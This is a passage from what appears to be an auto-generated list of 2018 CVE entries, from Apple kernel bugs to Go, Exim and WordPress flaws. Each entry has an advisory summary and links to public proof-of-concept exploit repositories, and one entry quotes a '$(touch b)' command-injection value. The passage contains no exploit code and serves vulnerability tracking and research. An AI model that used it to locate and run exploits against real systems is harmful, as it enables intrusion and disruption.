[saelo/cve-2018-4233](https://github.com/saelo/cve-2018-4233) + +### CVE-2018-4241 (2018-06-08) + +An issue was discovered in certain Apple products. iOS before 11.4 is affected. macOS before 10.13.5 is affected. tvOS before 11.4 is affected. watchOS before 4.3.1 is affected. The issue involves the "Kernel" component. A buffer overflow in mptcp_usr_connectx allows attackers to execute arbitrary code in a privileged context via a crafted app. + + +- [0neday/multi_path](https://github.com/0neday/multi_path) + +### CVE-2018-4242 (2018-06-08) + +An issue was discovered in certain Apple products. macOS before 10.13.5 is affected. The issue involves the "Hypervisor" component. It allows attackers to execute arbitrary code in a privileged context or cause a denial of service (memory corruption) via a crafted app. + + +- [yeonnic/Look-at-The-XNU-Through-A-Tube-CVE-2018-4242-Write-up-Translation-](https://github.com/yeonnic/Look-at-The-XNU-Through-A-Tube-CVE-2018-4242-Write-up-Translation-) + +### CVE-2018-4243 (2018-06-08) + +An issue was discovered in certain Apple products. iOS before 11.4 is affected. macOS before 10.13.5 is affected. tvOS before 11.4 is affected. watchOS before 4.3.1 is affected. The issue involves the "Kernel" component. A buffer overflow in getvolattrlist allows attackers to execute arbitrary code in a privileged context via a crafted app. + + +- [Jailbreaks/empty_list](https://github.com/Jailbreaks/empty_list) + +### CVE-2018-4248 (2019-04-03) + +An out-of-bounds read was addressed with improved input validation. This issue affected versions prior to iOS 11.4.1, macOS High Sierra 10.13.6, tvOS 11.4.1, watchOS 4.3.2. + + +- [bazad/xpc-string-leak](https://github.com/bazad/xpc-string-leak) + +### CVE-2018-4280 (2019-04-03) + +A memory corruption issue was addressed with improved memory handling. This issue affected versions prior to iOS 11.4.1, macOS High Sierra 10.13.6, tvOS 11.4.1, watchOS 4.3.2. + + +- [bazad/launchd-portrep](https://github.com/bazad/launchd-portrep) +- [bazad/blanket](https://github.com/bazad/blanket) + +### CVE-2018-4327 (2019-04-03) + +A memory corruption issue was addressed with improved memory handling. This issue affected versions prior to iOS 11.4.1. + + +- [omerporze/brokentooth](https://github.com/omerporze/brokentooth) +- [harryanon/POC-CVE-2018-4327-and-CVE-2018-4330](https://github.com/harryanon/POC-CVE-2018-4327-and-CVE-2018-4330) + +### CVE-2018-4330 (2019-01-11) + +In iOS before 11.4, a memory corruption issue exists and was addressed with improved memory handling. + + +- [omerporze/toothfairy](https://github.com/omerporze/toothfairy) + +### CVE-2018-4331 (2019-04-03) + +A memory corruption issue was addressed with improved memory handling. This issue affected versions prior to iOS 12, macOS Mojave 10.14, tvOS 12, watchOS 5. + + +- [bazad/gsscred-race](https://github.com/bazad/gsscred-race) + +### CVE-2018-4343 (2019-04-03) + +A memory corruption issue was addressed with improved memory handling. This issue affected versions prior to iOS 12, macOS Mojave 10.14, tvOS 12, watchOS 5. + + +- [bazad/gsscred-move-uaf](https://github.com/bazad/gsscred-move-uaf) + +### CVE-2018-4407 (2019-04-03) + +A memory corruption issue was addressed with improved validation. This issue affected versions prior to iOS 12, macOS Mojave 10.14, tvOS 12, watchOS 5. + + +- [Pa55w0rd/check_icmp_dos](https://github.com/Pa55w0rd/check_icmp_dos) +- [unixpickle/cve-2018-4407](https://github.com/unixpickle/cve-2018-4407) +- [s2339956/check_icmp_dos-CVE-2018-4407-](https://github.com/s2339956/check_icmp_dos-CVE-2018-4407-) +- [farisv/AppleDOS](https://github.com/farisv/AppleDOS) +- [WyAtu/CVE-2018-4407](https://github.com/WyAtu/CVE-2018-4407) +- [zteeed/CVE-2018-4407-IOS](https://github.com/zteeed/CVE-2018-4407-IOS) +- [SamDecrock/node-cve-2018-4407](https://github.com/SamDecrock/node-cve-2018-4407) +- [r3dxpl0it/CVE-2018-4407](https://github.com/r3dxpl0it/CVE-2018-4407) +- [lucagiovagnoli/CVE-2018-4407](https://github.com/lucagiovagnoli/CVE-2018-4407) +- [anonymouz4/Apple-Remote-Crash-Tool-CVE-2018-4407](https://github.com/anonymouz4/Apple-Remote-Crash-Tool-CVE-2018-4407) +- [soccercab/wifi](https://github.com/soccercab/wifi) +- [zeng9t/CVE-2018-4407-iOS-exploit](https://github.com/zeng9t/CVE-2018-4407-iOS-exploit) +- [5431/CVE-2018-4407](https://github.com/5431/CVE-2018-4407) +- [pwnhacker0x18/iOS-Kernel-Crash](https://github.com/pwnhacker0x18/iOS-Kernel-Crash) +- [Fans0n-Fan/CVE-2018-4407](https://github.com/Fans0n-Fan/CVE-2018-4407) +- [szabo-tibor/CVE-2018-4407](https://github.com/szabo-tibor/CVE-2018-4407) + +### CVE-2018-4411 (2019-04-03) + +A memory corruption issue was addressed with improved input validation. This issue affected versions prior to macOS Mojave 10.14. + + +- [lilang-wu/POC-CVE-2018-4411](https://github.com/lilang-wu/POC-CVE-2018-4411) + +### CVE-2018-4415 (2019-04-03) + +A memory corruption issue was addressed with improved memory handling. This issue affected versions prior to macOS Mojave 10.14.1. + + +- [T1V0h/CVE-2018-4415](https://github.com/T1V0h/CVE-2018-4415) + +### CVE-2018-4416 (2019-04-03) + +Multiple memory corruption issues were addressed with improved memory handling. This issue affected versions prior to iOS 12.1, tvOS 12.1, watchOS 5.1, Safari 12.0.1, iTunes 12.9.1, iCloud for Windows 7.8. + + +- [erupmi/CVE-2018-4416-exploit](https://github.com/erupmi/CVE-2018-4416-exploit) + +### CVE-2018-4431 (2019-04-03) + +A memory initialization issue was addressed with improved memory handling. This issue affected versions prior to iOS 12.1.1, macOS Mojave 10.14.2, tvOS 12.1.1, watchOS 5.1.2. + + +- [ktiOSz/PoC_iOS12](https://github.com/ktiOSz/PoC_iOS12) + +### CVE-2018-4441 (2019-04-03) + +A memory corruption issue was addressed with improved memory handling. This issue affected versions prior to iOS 12.1.1, tvOS 12.1.1, watchOS 5.1.2, Safari 12.0.2, iTunes 12.9.2 for Windows, iCloud for Windows 7.9. + + +- [Cryptogenic/PS4-6.20-WebKit-Code-Execution-Exploit](https://github.com/Cryptogenic/PS4-6.20-WebKit-Code-Execution-Exploit) + +### CVE-2018-4878 (2018-02-06) + +A use-after-free vulnerability was discovered in Adobe Flash Player before 28.0.0.161. This vulnerability occurs due to a dangling pointer in the Primetime SDK related to media player handling of listener objects. A successful attack can lead to arbitrary code execution. This was exploited in the wild in January and February 2018. + + +- [ydl555/CVE-2018-4878-](https://github.com/ydl555/CVE-2018-4878-) +- [mdsecactivebreach/CVE-2018-4878](https://github.com/mdsecactivebreach/CVE-2018-4878) +- [hybridious/CVE-2018-4878](https://github.com/hybridious/CVE-2018-4878) +- [vysecurity/CVE-2018-4878](https://github.com/vysecurity/CVE-2018-4878) +- [KathodeN/CVE-2018-4878](https://github.com/KathodeN/CVE-2018-4878) +- [SyFi/CVE-2018-4878](https://github.com/SyFi/CVE-2018-4878) +- [ydl555/CVE-2018-4878](https://github.com/ydl555/CVE-2018-4878) +- [B0fH/CVE-2018-4878](https://github.com/B0fH/CVE-2018-4878) +- [Yable/CVE-2018-4878](https://github.com/Yable/CVE-2018-4878) +- [HuanWoWeiLan/SoftwareSystemSecurity-2019](https://github.com/HuanWoWeiLan/SoftwareSystemSecurity-2019) +- [lvyoshino/CVE-2018-4878](https://github.com/lvyoshino/CVE-2018-4878) + +### CVE-2018-4879 (2018-02-27) + +An issue was discovered in Adobe Acrobat Reader 2018.009.20050 and earlier versions, 2017.011.30070 and earlier versions, 2015.006.30394 and earlier versions. The vulnerability is caused by the computation that writes data past the end of the intended buffer; the computation is part of the image conversion module that processes Enhanced Metafile Format Plus (EMF+) data. An attacker can potentially leverage the vulnerability to corrupt sensitive data or execute arbitrary code. + + +- [H3llozy/CVE-2018-4879](https://github.com/H3llozy/CVE-2018-4879) + +### CVE-2018-4901 (2018-02-27) + +An issue was discovered in Adobe Acrobat Reader 2018.009.20050 and earlier versions, 2017.011.30070 and earlier versions, 2015.006.30394 and earlier versions. The vulnerability is caused by the computation that writes data past the end of the intended buffer; the computation is part of the document identity representation. An attacker can potentially leverage the vulnerability to corrupt sensitive data or execute arbitrary code. + + +- [bigric3/CVE-2018-4901](https://github.com/bigric3/CVE-2018-4901) + +### CVE-2018-5146 (2018-06-11) + +An out of bounds memory write while processing Vorbis audio data was reported through the Pwn2Own contest. This vulnerability affects Firefox < 59.0.1, Firefox ESR < 52.7.2, and Thunderbird < 52.7. + + +- [f01965/CVE-2018-5146](https://github.com/f01965/CVE-2018-5146) + +### CVE-2018-5158 (2018-06-11) + +The PDF viewer does not sufficiently sanitize PostScript calculator functions, allowing malicious JavaScript to be injected through a crafted PDF file. This JavaScript can then be run with the permissions of the PDF viewer by its worker. This vulnerability affects Firefox ESR < 52.8 and Firefox < 60. + + +- [ppcrab/CVE-2018-5158](https://github.com/ppcrab/CVE-2018-5158) +- [puzzle-tools/-CVE-2018-5158.pdf](https://github.com/puzzle-tools/-CVE-2018-5158.pdf) + +### CVE-2018-5234 (2018-04-30) + +The Norton Core router prior to v237 may be susceptible to a command injection exploit. This is a type of attack in which the goal is execution of arbitrary commands on the host system via vulnerable software. + + +- [embedi/ble_norton_core](https://github.com/embedi/ble_norton_core) +- [saruman9/ble_connect_rust](https://github.com/saruman9/ble_connect_rust) + +### CVE-2018-5333 (2018-01-11) + +In the Linux kernel through 4.14.13, the rds_cmsg_atomic function in net/rds/rdma.c mishandles cases where page pinning fails or an invalid address is supplied, leading to an rds_atomic_free_op NULL pointer dereference. + + +- [hoanganh2k/cve-2018-5333](https://github.com/hoanganh2k/cve-2018-5333) + +### CVE-2018-5353 (2020-09-29) + +The custom GINA/CP module in Zoho ManageEngine ADSelfService Plus before 5.5 build 5517 allows remote attackers to execute code and escalate privileges via spoofing. It does not authenticate the intended server before opening a browser window. An unauthenticated attacker capable of conducting a spoofing attack can redirect the browser to gain execution in the context of the WinLogon.exe process. If Network Level Authentication is not enforced, the vulnerability can be exploited via RDP. Additionally, if the web server has a misconfigured certificate then no spoofing attack is required + + +- [missing0x00/CVE-2018-5353](https://github.com/missing0x00/CVE-2018-5353) + +### CVE-2018-5354 (2020-09-29) + +The custom GINA/CP module in ANIXIS Password Reset Client before version 3.22 allows remote attackers to execute code and escalate privileges via spoofing. When the client is configured to use HTTP, it does not authenticate the intended server before opening a browser window. An unauthenticated attacker capable of conducting a spoofing attack can redirect the browser to gain execution in the context of the WinLogon.exe process. If Network Level Authentication is not enforced, the vulnerability can be exploited via RDP. + + +- [missing0x00/CVE-2018-5354](https://github.com/missing0x00/CVE-2018-5354) + +### CVE-2018-5711 (2018-01-16) + +gd_gif_in.c in the GD Graphics Library (aka libgd), as used in PHP before 5.6.33, 7.0.x before 7.0.27, 7.1.x before 7.1.13, and 7.2.x before 7.2.1, has an integer signedness error that leads to an infinite loop via a crafted GIF file, as demonstrated by a call to the imagecreatefromgif or imagecreatefromstring PHP function. This is related to GetCode_ and gdImageCreateFromGifCtx. + + +- [huzhenghui/Test-7-2-0-PHP-CVE-2018-5711](https://github.com/huzhenghui/Test-7-2-0-PHP-CVE-2018-5711) +- [huzhenghui/Test-7-2-1-PHP-CVE-2018-5711](https://github.com/huzhenghui/Test-7-2-1-PHP-CVE-2018-5711) + +### CVE-2018-5728 (2018-01-16) + +Cobham Sea Tel 121 build 222701 devices allow remote attackers to obtain potentially sensitive information via a /cgi-bin/getSysStatus request, as demonstrated by the Latitude/Longitude of the ship, or satellite details. + + +- [ezelf/seatel_terminals](https://github.com/ezelf/seatel_terminals) + +### CVE-2018-5740 (2019-01-16) + +"deny-answer-aliases" is a little-used feature intended to help recursive server operators protect end users against DNS rebinding attacks, a potential method of circumventing the security model used by client browsers. However, a defect in this feature makes it easy, when the feature is in use, to experience an assertion failure in name.c. Affects BIND 9.7.0->9.8.8, 9.9.0->9.9.13, 9.10.0->9.10.8, 9.11.0->9.11.4, 9.12.0->9.12.2, 9.13.0->9.13.2. + + +- [sischkg/cve-2018-5740](https://github.com/sischkg/cve-2018-5740) + +### CVE-2018-5767 (2018-02-15) + +An issue was discovered on Tenda AC15 V15.03.1.16_multi devices. A remote, unauthenticated attacker can gain remote code execution on the device with a crafted password parameter for the COOKIE header. + + +- [db44k/CVE-2018-5767-AC9](https://github.com/db44k/CVE-2018-5767-AC9) +- [Scorpion-Security-Labs/CVE-2018-5767-AC9](https://github.com/Scorpion-Security-Labs/CVE-2018-5767-AC9) + +### CVE-2018-5873 (2018-07-06) + +An issue was discovered in the __ns_get_path function in fs/nsfs.c in the Linux kernel before 4.11. Due to a race condition when accessing files, a Use After Free condition can occur. This also affects all Android releases from CAF using the Linux kernel (Android for MSM, Firefox OS for MSM, QRD Android) before security patch level 2018-07-05. + + +- [Trinadh465/linux-4.1.15_CVE-2018-5873](https://github.com/Trinadh465/linux-4.1.15_CVE-2018-5873) + +### CVE-2018-5951 (2020-03-02) + +An issue was discovered in Mikrotik RouterOS. Crafting a packet that has a size of 1 byte and sending it to an IPv6 address of a RouterOS box with IP Protocol 97 will cause RouterOS to reboot imminently. All versions of RouterOS that supports EoIPv6 are vulnerable to this attack. + + +- [Nat-Lab/CVE-2018-5951](https://github.com/Nat-Lab/CVE-2018-5951) + +### CVE-2018-5955 (2018-01-21) + +An issue was discovered in GitStack through 2.3.10. User controlled input is not sufficiently filtered, allowing an unauthenticated attacker to add a user to the server via the username and password fields to the rest/user/ URI. + + +- [b0bac/GitStackRCE](https://github.com/b0bac/GitStackRCE) +- [YagamiiLight/Cerberus](https://github.com/YagamiiLight/Cerberus) +- [MikeTheHash/CVE-2018-5955](https://github.com/MikeTheHash/CVE-2018-5955) + +### CVE-2018-6065 (2018-11-14) + +Integer overflow in computing the required allocation size when instantiating a new javascript object in V8 in Google Chrome prior to 65.0.3325.146 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. + + +- [b1tg/CVE-2018-6065-exploit](https://github.com/b1tg/CVE-2018-6065-exploit) + +### CVE-2018-6066 (2018-11-14) + +Lack of CORS checking by ResourceFetcher/ResourceLoader in Blink in Google Chrome prior to 65.0.3325.146 allowed a remote attacker to leak cross-origin data via a crafted HTML page. + + +- [DISREL/Ring0VBA](https://github.com/DISREL/Ring0VBA) + +### CVE-2018-6242 (2018-05-01) + +Some NVIDIA Tegra mobile processors released prior to 2016 contain a buffer overflow vulnerability in BootROM Recovery Mode (RCM). An attacker with physical access to the device's USB and the ability to force the device to reboot into RCM could exploit the vulnerability to execute unverified code. + + +- [DavidBuchanan314/NXLoader](https://github.com/DavidBuchanan314/NXLoader) +- [reswitched/rcm-modchips](https://github.com/reswitched/rcm-modchips) +- [ChrisFigura/react-tegra-payload-launcher](https://github.com/ChrisFigura/react-tegra-payload-launcher) +- [austinhartzheim/fusee-gelee](https://github.com/austinhartzheim/fusee-gelee) +- [Swiftloke/fusee-toy](https://github.com/Swiftloke/fusee-toy) + +### CVE-2018-6341 (2018-12-31) + +React applications which rendered to HTML using the ReactDOMServer API were not escaping user-supplied attribute names at render-time. That lack of escaping could lead to a cross-site scripting vulnerability. This issue affected minor releases 16.0.x, 16.1.x, 16.2.x, 16.3.x, and 16.4.x. It was fixed in 16.0.1, 16.1.2, 16.2.1, 16.3.3, and 16.4.2. + + +- [diwangs/react16-ssr](https://github.com/diwangs/react16-ssr) + +### CVE-2018-6376 (2018-01-30) + +In Joomla! before 3.8.4, the lack of type casting of a variable in a SQL statement leads to a SQL injection vulnerability in the Hathor postinstall message. + + +- [knqyf263/CVE-2018-6376](https://github.com/knqyf263/CVE-2018-6376) + +### CVE-2018-6389 (2018-02-06) + +In WordPress through 4.9.2, unauthenticated attackers can cause a denial of service (resource consumption) by using the large list of registered .js files (from wp-includes/script-loader.php) to construct a series of requests to load every file many times. + + +- [yolabingo/wordpress-fix-cve-2018-6389](https://github.com/yolabingo/wordpress-fix-cve-2018-6389) +- [safebuffer/CVE-2018-6389](https://github.com/safebuffer/CVE-2018-6389) +- [rastating/modsecurity-cve-2018-6389](https://github.com/rastating/modsecurity-cve-2018-6389) +- [knqyf263/CVE-2018-6389](https://github.com/knqyf263/CVE-2018-6389) +- [JulienGadanho/cve-2018-6389-php-patcher](https://github.com/JulienGadanho/cve-2018-6389-php-patcher) +- [dsfau/wordpress-CVE-2018-6389](https://github.com/dsfau/wordpress-CVE-2018-6389) +- [Jetserver/CVE-2018-6389-FIX](https://github.com/Jetserver/CVE-2018-6389-FIX) +- [thechrono13/PoC---CVE-2018-6389](https://github.com/thechrono13/PoC---CVE-2018-6389) +- [BlackRouter/cve-2018-6389](https://github.com/BlackRouter/cve-2018-6389) +- [alessiogilardi/PoC---CVE-2018-6389](https://github.com/alessiogilardi/PoC---CVE-2018-6389) +- [JavierOlmedo/wordpress-cve-2018-6389](https://github.com/JavierOlmedo/wordpress-cve-2018-6389) +- [m3ssap0/wordpress_cve-2018-6389](https://github.com/m3ssap0/wordpress_cve-2018-6389) +- [s0md3v/Shiva](https://github.com/s0md3v/Shiva) +- [mudhappy/Wordpress-Hack-CVE-2018-6389](https://github.com/mudhappy/Wordpress-Hack-CVE-2018-6389) +- [armaanpathan12345/WP-DOS-Exploit-CVE-2018-6389](https://github.com/armaanpathan12345/WP-DOS-Exploit-CVE-2018-6389) +- [ItinerisLtd/trellis-cve-2018-6389](https://github.com/ItinerisLtd/trellis-cve-2018-6389) +- [Zazzzles/Wordpress-DOS](https://github.com/Zazzzles/Wordpress-DOS) +- [fakedob/tvsz](https://github.com/fakedob/tvsz) +- [vineetkia/Wordpress-DOS-Attack-CVE-2018-6389](https://github.com/vineetkia/Wordpress-DOS-Attack-CVE-2018-6389) +- [ianxtianxt/CVE-2018-6389](https://github.com/ianxtianxt/CVE-2018-6389) +- [amit-pathak009/CVE-2018-6389-FIX](https://github.com/amit-pathak009/CVE-2018-6389-FIX) + +### CVE-2018-6396 (2018-02-17) + +SQL Injection exists in the Google Map Landkarten through 4.2.3 component for Joomla! via the cid or id parameter in a layout=form_markers action, or the map parameter in a layout=default action. + + +- [JavierOlmedo/joomla-cve-2018-6396](https://github.com/JavierOlmedo/joomla-cve-2018-6396) + +### CVE-2018-6407 (2018-01-30) + +An issue was discovered on Conceptronic CIPCAMPTIWL V3 0.61.30.21 devices. An unauthenticated attacker can crash a device by sending a POST request with a huge body size to /hy-cgi/devices.cgi?cmd=searchlandevice. The crash completely freezes the device. + + +- [dreadlocked/ConceptronicIPCam_MultipleVulnerabilities](https://github.com/dreadlocked/ConceptronicIPCam_MultipleVulnerabilities) + +### CVE-2018-6479 (2018-01-31) + +An issue was discovered on Netwave IP Camera devices. An unauthenticated attacker can crash a device by sending a POST request with a huge body size to the / URI. + + +- [dreadlocked/netwave-dosvulnerability](https://github.com/dreadlocked/netwave-dosvulnerability) +- [LeQuocKhanh2K/Tool_Camera_Exploit_Netwave_CVE-2018-6479](https://github.com/LeQuocKhanh2K/Tool_Camera_Exploit_Netwave_CVE-2018-6479) + +### CVE-2018-6518 (2018-04-26) + +Composr CMS 10.0.13 has XSS via the site_name parameter in a page=admin-setupwizard&type=step3 request to /adminzone/index.php. + + +- [faizzaidi/Composr-CMS-10.0.13-Cross-Site-Scripting-XSS](https://github.com/faizzaidi/Composr-CMS-10.0.13-Cross-Site-Scripting-XSS) + +### CVE-2018-6546 (2018-04-13) + +plays_service.exe in the plays.tv service before 1.27.7.0, as distributed in AMD driver-installation packages and Gaming Evolved products, executes code at a user-defined (local or SMB) path as SYSTEM when the execute_installer parameter is used in an HTTP message. This occurs without properly authenticating the user. + + +- [securifera/CVE-2018-6546-Exploit](https://github.com/securifera/CVE-2018-6546-Exploit) + +### CVE-2018-6574 (2018-02-07) + +Go before 1.8.7, Go 1.9.x before 1.9.4, and Go 1.10 pre-releases before Go 1.10rc2 allow "go get" remote command execution during source code build, by leveraging the gcc or clang plugin feature, because -fplugin= and -plugin= arguments were not blocked. + + +- [acole76/cve-2018-6574](https://github.com/acole76/cve-2018-6574) +- [neargle/Go-Get-RCE-CVE-2018-6574-POC](https://github.com/neargle/Go-Get-RCE-CVE-2018-6574-POC) +- [wb4r/go-get-rce](https://github.com/wb4r/go-get-rce) +- [ahmetmanga/go-get-rce](https://github.com/ahmetmanga/go-get-rce) +- [ahmetmanga/cve-2018-6574](https://github.com/ahmetmanga/cve-2018-6574) +- [redirected/cve-2018-6574](https://github.com/redirected/cve-2018-6574) +- [20matan/CVE-2018-6574-POC](https://github.com/20matan/CVE-2018-6574-POC) +- [zur250/Zur-Go-GET-RCE-Solution](https://github.com/zur250/Zur-Go-GET-RCE-Solution) +- [mekhalleh/cve-2018-6574](https://github.com/mekhalleh/cve-2018-6574) +- [veter069/go-get-rce](https://github.com/veter069/go-get-rce) +- [duckzsc2/CVE-2018-6574-POC](https://github.com/duckzsc2/CVE-2018-6574-POC) +- [dollyptm/cve-2018-6574](https://github.com/dollyptm/cve-2018-6574) +- [qweraqq/CVE-2018-6574](https://github.com/qweraqq/CVE-2018-6574) +- [d4rkshell/go-get-rce](https://github.com/d4rkshell/go-get-rce) +- [chaosura/CVE-2018-6574](https://github.com/chaosura/CVE-2018-6574) +- [french560/ptl6574](https://github.com/french560/ptl6574) +- [InfoSecJack/CVE-2018-6574](https://github.com/InfoSecJack/CVE-2018-6574) +- [asavior2/CVE-2018-6574](https://github.com/asavior2/CVE-2018-6574) +- [drset/golang](https://github.com/drset/golang) +- [frozenkp/CVE-2018-6574](https://github.com/frozenkp/CVE-2018-6574) +- [kev-ho/cve-2018-6574-payload](https://github.com/kev-ho/cve-2018-6574-payload) +- [sdosis/cve-2018-6574](https://github.com/sdosis/cve-2018-6574) +- [No1zy/CVE-2018-6574-PoC](https://github.com/No1zy/CVE-2018-6574-PoC) +- [nthuong95/CVE-2018-6574](https://github.com/nthuong95/CVE-2018-6574) +- [AdriVillaB/CVE-2018-6574](https://github.com/AdriVillaB/CVE-2018-6574) +- [yitingfan/CVE-2018-6574_demo](https://github.com/yitingfan/CVE-2018-6574_demo) +- [mhamed366/CVE-2018-6574](https://github.com/mhamed366/CVE-2018-6574) +- [Eugene24/CVE-2018-6574](https://github.com/Eugene24/CVE-2018-6574) +- [coblax/CVE-2018-6574](https://github.com/coblax/CVE-2018-6574) +- [darthvader-htb/CVE-2018-6574](https://github.com/darthvader-htb/CVE-2018-6574) +- [it3x55/CVE-2018-6574](https://github.com/it3x55/CVE-2018-6574) +- [Malone5923/CVE-2018-6574-go-get-RCE](https://github.com/Malone5923/CVE-2018-6574-go-get-RCE) +- [illnino/CVE-2018-6574](https://github.com/illnino/CVE-2018-6574) +- [TakuCoder/CVE-2018-6574](https://github.com/TakuCoder/CVE-2018-6574) +- [kawkab101/cve-2018-6574](https://github.com/kawkab101/cve-2018-6574) +- [lsnakazone/cve-2018-6574](https://github.com/lsnakazone/cve-2018-6574) +- [pswalia2u/CVE-2018-6574](https://github.com/pswalia2u/CVE-2018-6574) +- [jongmartinez/CVE-2018-6574-POC](https://github.com/jongmartinez/CVE-2018-6574-POC) +- [azzzzzzzzzzzzzzzzz/CVE-2018-6574](https://github.com/azzzzzzzzzzzzzzzzz/CVE-2018-6574) +- [noname-nohost/CVE-2018-6574](https://github.com/noname-nohost/CVE-2018-6574) +- [shadofren/CVE-2018-6574](https://github.com/shadofren/CVE-2018-6574) +- [NikolaT3sla/cve-2018-6574](https://github.com/NikolaT3sla/cve-2018-6574) +- [vishack/CVE-2018-6574](https://github.com/vishack/CVE-2018-6574) +- [PLP-Orange/cve-2018-6574-exercise](https://github.com/PLP-Orange/cve-2018-6574-exercise) +- [purgedemo/CVE-2018-6574](https://github.com/purgedemo/CVE-2018-6574) +- [purgedemo/CVE-2018-6574_2](https://github.com/purgedemo/CVE-2018-6574_2) +- [killtr0/POC-CVE-2018-6574](https://github.com/killtr0/POC-CVE-2018-6574) +- [theJuan1112/pentesterlab-cve-2018-6574](https://github.com/theJuan1112/pentesterlab-cve-2018-6574) +- [MohamedTarekq/test-CVE-2018-6574-](https://github.com/MohamedTarekq/test-CVE-2018-6574-) +- [OLAOLAOLA789/CVE-2018-6574](https://github.com/OLAOLAOLA789/CVE-2018-6574) +- [repos13579/labCVE-2018-6574](https://github.com/repos13579/labCVE-2018-6574) +- [sec000/cve-2018-6574](https://github.com/sec000/cve-2018-6574) +- [jaya522/CVE-2018-6574-go-get-RCE](https://github.com/jaya522/CVE-2018-6574-go-get-RCE) +- [noobTest1122/CVE-2018-6574](https://github.com/noobTest1122/CVE-2018-6574) +- [ErnestZiemkowski/cve-2018-6574](https://github.com/ErnestZiemkowski/cve-2018-6574) +- [l3ouu4n9/CVE-2018-6574-POC](https://github.com/l3ouu4n9/CVE-2018-6574-POC) +- [R3dAlch3mist/cve-2018-6574](https://github.com/R3dAlch3mist/cve-2018-6574) +- [Devang-Solanki/CVE-2018-6574](https://github.com/Devang-Solanki/CVE-2018-6574) +- [ItsFadinG/CVE-2018-6574](https://github.com/ItsFadinG/CVE-2018-6574) +- [imojne/CVE-2018-6574-POC](https://github.com/imojne/CVE-2018-6574-POC) +- [twseptian/cve-2018-6574](https://github.com/twseptian/cve-2018-6574) +- [the-valluvarsploit/CVE-2018-6574](https://github.com/the-valluvarsploit/CVE-2018-6574) +- [yavolo/CVE-2018-6574](https://github.com/yavolo/CVE-2018-6574) +- [jftierno/CVE-2018-6574](https://github.com/jftierno/CVE-2018-6574) +- [Cypheer/exploit_CVE-2018-6574](https://github.com/Cypheer/exploit_CVE-2018-6574) +- [jftierno/CVE-2018-6574-2](https://github.com/jftierno/CVE-2018-6574-2) +- [tjcim/cve-2018-6574](https://github.com/tjcim/cve-2018-6574) +- [markisback/CVE-2018-6574](https://github.com/markisback/CVE-2018-6574) +- [hasharmujahid/CVE-2018-6574-go-get-RCE](https://github.com/hasharmujahid/CVE-2018-6574-go-get-RCE) +- [jeyaseelans86/CVE-2018-6574](https://github.com/jeyaseelans86/CVE-2018-6574) +- [jeyaseelans86/new-CVE-2018-6574](https://github.com/jeyaseelans86/new-CVE-2018-6574) +- [chr1sM/CVE-2018-6574](https://github.com/chr1sM/CVE-2018-6574) +- [mux0x/CVE-2018-6574](https://github.com/mux0x/CVE-2018-6574) +- [seoqqq/CVE-2018-6574](https://github.com/seoqqq/CVE-2018-6574) +- [antunesmpedro/CVE-2018-6574](https://github.com/antunesmpedro/CVE-2018-6574) +- [jahwni/CVE-2018-6574](https://github.com/jahwni/CVE-2018-6574) +- [NsByte/CVE-2018-6574](https://github.com/NsByte/CVE-2018-6574) +- [Zeeshan12340/CVE-2018-6574](https://github.com/Zeeshan12340/CVE-2018-6574) +- [moTorky/CVE-2018-6574-POC](https://github.com/moTorky/CVE-2018-6574-POC) +- [Ashved9/Orange](https://github.com/Ashved9/Orange) +- [zerbaliy3v/cve-2018-6574-exploit](https://github.com/zerbaliy3v/cve-2018-6574-exploit) +- [jftierno/-CVE-2018-6574](https://github.com/jftierno/-CVE-2018-6574) +- [faiqu3/cve-2018-6574](https://github.com/faiqu3/cve-2018-6574) +- [Dannners/CVE-2018-6574-go-get-RCE](https://github.com/Dannners/CVE-2018-6574-go-get-RCE) +- [bme2003/CVE-2018-6574](https://github.com/bme2003/CVE-2018-6574) +- [iNoSec2/cve-2018-6574](https://github.com/iNoSec2/cve-2018-6574) +- [faqihudin13/CVE-2018-6574](https://github.com/faqihudin13/CVE-2018-6574) +- [lisu60/cve-2018-6574](https://github.com/lisu60/cve-2018-6574) +- [Saboor-Hakimi/CVE-2018-6574](https://github.com/Saboor-Hakimi/CVE-2018-6574) + +### CVE-2018-6622 (2018-08-17) + +An issue was discovered that affects all producers of BIOS firmware who make a certain realistic interpretation of an obscure portion of the Trusted Computing Group (TCG) Trusted Platform Module (TPM) 2.0 specification. An abnormal case is not handled properly by this firmware while S3 sleep and can clear TPM 2.0. It allows local users to overwrite static PCRs of TPM and neutralize the security features of it, such as seal/unseal and remote attestation. + + +- [kkamagui/napper-for-tpm](https://github.com/kkamagui/napper-for-tpm) + +### CVE-2018-6643 (2018-08-28) + +Infoblox NetMRI 7.1.1 has Reflected Cross-Site Scripting via the /api/docs/index.php query parameter. + + +- [undefinedmode/CVE-2018-6643](https://github.com/undefinedmode/CVE-2018-6643) + +### CVE-2018-6789 (2018-02-08) + +An issue was discovered in the base64d function in the SMTP listener in Exim before 4.90.1. By sending a handcrafted message, a buffer overflow may happen. This can be used to execute code remotely. + + +- [c0llision/exim-vuln-poc](https://github.com/c0llision/exim-vuln-poc) +- [beraphin/CVE-2018-6789](https://github.com/beraphin/CVE-2018-6789) +- [synacktiv/Exim-CVE-2018-6789](https://github.com/synacktiv/Exim-CVE-2018-6789) +- [martinclauss/exim-rce-cve-2018-6789](https://github.com/martinclauss/exim-rce-cve-2018-6789) +- [thistehneisen/CVE-2018-6789-Python3](https://github.com/thistehneisen/CVE-2018-6789-Python3) + +### CVE-2018-6791 (2018-02-07) + +An issue was discovered in soliduiserver/deviceserviceaction.cpp in KDE Plasma Workspace before 5.12.0. When a vfat thumbdrive that contains `` or $() in its volume label is plugged in and mounted through the device notifier, it's interpreted as a shell command, leading to a possibility of arbitrary command execution. An example of an offending volume label is "$(touch b)" -- this will create a file called b in the home folder. + + +- [rarar0/KDE_Vuln](https://github.com/rarar0/KDE_Vuln) + +### CVE-2018-6890 (2018-02-22) + +Cross-site scripting (XSS) vulnerability in Wolf CMS 0.8.3.1 via the page editing feature, as demonstrated by /?/admin/page/edit/3. + + +- [pradeepjairamani/WolfCMS-XSS-POC](https://github.com/pradeepjairamani/WolfCMS-XSS-POC) + +### CVE-2018-6892 (2018-02-11) + +An issue was discovered in CloudMe before 1.11.0. An unauthenticated remote attacker that can connect to the "CloudMe Sync" client application listening on port 8888 can send a malicious payload causing a buffer overflow condition. This will result in an attacker controlling the program's execution flow and allowing arbitrary code execution. + + +- [manojcode/CloudMe-Sync-1.10.9---Buffer-Overflow-SEH-DEP-Bypass](https://github.com/manojcode/CloudMe-Sync-1.10.9---Buffer-Overflow-SEH-DEP-Bypass) +- 